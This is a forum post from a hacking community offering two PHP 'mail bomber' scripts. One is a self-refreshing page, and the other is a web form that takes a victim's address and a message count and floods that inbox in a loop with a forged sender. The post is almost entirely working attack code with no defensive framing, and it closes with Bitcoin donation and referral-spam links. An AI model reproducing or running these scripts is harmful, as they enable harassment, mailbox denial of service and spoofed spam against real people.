PHP E-mail Bomber 01-28-2013, 11:59 PM
#1
I think the simple is the better.
Redirecting method:
Looped (have to thank hackarchives):
body is the content of the email.
sender is the sender and victim the receiver.
server.com your website where hosting this script.
object is the subject of the message.
this is a very basical PHP script but does its job.
thanks anybody.
Redirecting method:
PHP Code:
<?php
$body = "My name is noize. noize the mailbomber. i'm a hacker, my friend.";
$body .= "\nM4ILB0MB3D!";
$email = "noize@thehacker.com";
$object = "H4CK3D!";
@mail('victimmail', $object, $body, "From: $email");
?>
<meta http-equiv="refresh" content="0;URL=http://www.server.com/mailbomber.php">
Looped (have to thank hackarchives):
PHP Code:
<html>
<title>Mailbomber by noize</title>
<form action="" method="post">
Sender's email: <input type="text" name="sender" size="30" /><br>
Victim's email: <input type="text" name="victim" size="30" /><br>
Subject: <input type="text" name="subject" size="37" /><br>
Body: <input type="text" name="body" size="39" /><br>
Number of emails to send: <input type="text" name="number" size="18" /><br>
<input type="submit" value="Start" style="position: relative; top: 11px; left: 180px; width: 115px; height: 30px;" /><br>
<input type="hidden" name="submitted" value="TRUE" />
</form>
</html>
<?php
if(isset($_POST['submit']))
{
$body = $_POST['body'];
$body .= "\nM4ILB0MB3D!";
$victim = $_POST['victim'];
$sender = $_POST['sender'];
$subject = $_POST['subject'];
$a = $_POST['number'];
$i = 0;
while ($i<=$a) {
@mail("$victim", $subject, $body, "From: $sender");
$i++;
}
echo "Sent " . $i . " emails.<br>";
}
?>
body is the content of the email.
sender is the sender and victim the receiver.
server.com your website where hosting this script.
object is the subject of the message.
this is a very basical PHP script but does its job.
thanks anybody.
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U
If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U
If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize